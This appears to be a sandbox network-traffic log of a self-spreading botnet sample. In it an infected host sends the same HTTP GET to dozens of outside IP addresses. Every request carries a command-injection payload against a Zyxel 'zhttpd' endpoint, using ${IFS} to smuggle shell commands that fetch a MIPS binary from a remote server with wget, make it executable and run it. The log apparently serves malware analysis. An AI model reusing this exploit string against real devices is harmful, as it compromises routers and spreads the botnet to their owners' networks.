                                            Jan 14, 2024 15:50:36.351435900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3261192.168.2.2344018117.59.54.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351471901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3262192.168.2.2360334167.57.254.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351500034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3263192.168.2.235223850.244.78.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351537943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3264192.168.2.2338990126.232.254.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351562023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3265192.168.2.234151223.173.213.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351576090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3266192.168.2.2359614216.92.80.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351624966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3267192.168.2.2359616124.85.13.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351661921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3268192.168.2.233917223.255.198.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351680994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3269192.168.2.235402066.204.28.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351718903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3270192.168.2.2339296107.212.212.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351749897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3271192.168.2.2340244155.195.216.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351771116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3272192.168.2.236067077.217.192.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351773024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3273192.168.2.2337288198.48.240.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351820946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3274192.168.2.2332774155.12.180.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351836920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3275192.168.2.234295648.147.238.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351882935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3276192.168.2.2357866197.60.229.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351906061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3277192.168.2.234041665.5.59.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351938009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3278192.168.2.233790427.157.183.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351963043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3279192.168.2.235802466.45.158.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352005005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3280192.168.2.234091224.85.240.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352041960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3281192.168.2.233327220.49.44.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352047920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3282192.168.2.233573684.210.70.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352099895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3283192.168.2.2343842132.226.86.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352116108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3284192.168.2.2341168100.222.54.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352168083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3285192.168.2.2337214160.110.77.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352190018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3286192.168.2.235396049.52.140.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352214098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3287192.168.2.235590252.20.108.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352250099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3288192.168.2.234408297.140.200.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352281094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3289192.168.2.234702225.53.127.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352313995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3290192.168.2.2346026112.244.8.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352348089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3291192.168.2.2342164178.138.211.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352371931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3292192.168.2.233376878.31.0.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352401972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3293192.168.2.235003485.211.132.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352433920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3294192.168.2.234593674.152.64.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352433920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3295192.168.2.2360828206.43.244.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352469921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3296192.168.2.2337350131.253.3.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352503061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3297192.168.2.2340388157.235.236.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352544069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3298192.168.2.2338996111.39.73.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352550030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3299192.168.2.234379267.161.21.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352570057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3300192.168.2.234910865.222.103.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352603912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3301192.168.2.2345118164.150.222.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352632999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3302192.168.2.2335296188.253.176.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352657080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3303192.168.2.234826452.102.51.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352730989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3304192.168.2.234856270.217.187.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352742910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3305192.168.2.2352932189.75.222.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352751970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3306192.168.2.2340458140.249.206.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352793932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3307192.168.2.235724058.81.148.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352823973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3308192.168.2.233731623.37.112.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352874041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3309192.168.2.2336738197.136.69.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352890015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3310192.168.2.235521220.249.33.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352915049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3311192.168.2.234124680.170.101.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352969885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3312192.168.2.235267223.88.248.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.352999926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3313192.168.2.235299676.112.106.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353039980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3314192.168.2.234502057.232.50.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353075027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3315192.168.2.2351572181.68.180.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353094101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3316192.168.2.2355548155.195.168.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353107929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3317192.168.2.2350556148.253.111.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353166103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3318192.168.2.2339008131.215.149.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353197098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3319192.168.2.235019070.90.98.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353203058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3320192.168.2.234568432.106.247.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353203058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3321192.168.2.2338238188.222.70.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353214979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3322192.168.2.235713868.126.106.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353235960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3323192.168.2.2335384202.75.38.79443
                                            TimestampBytes transferredDirectionData
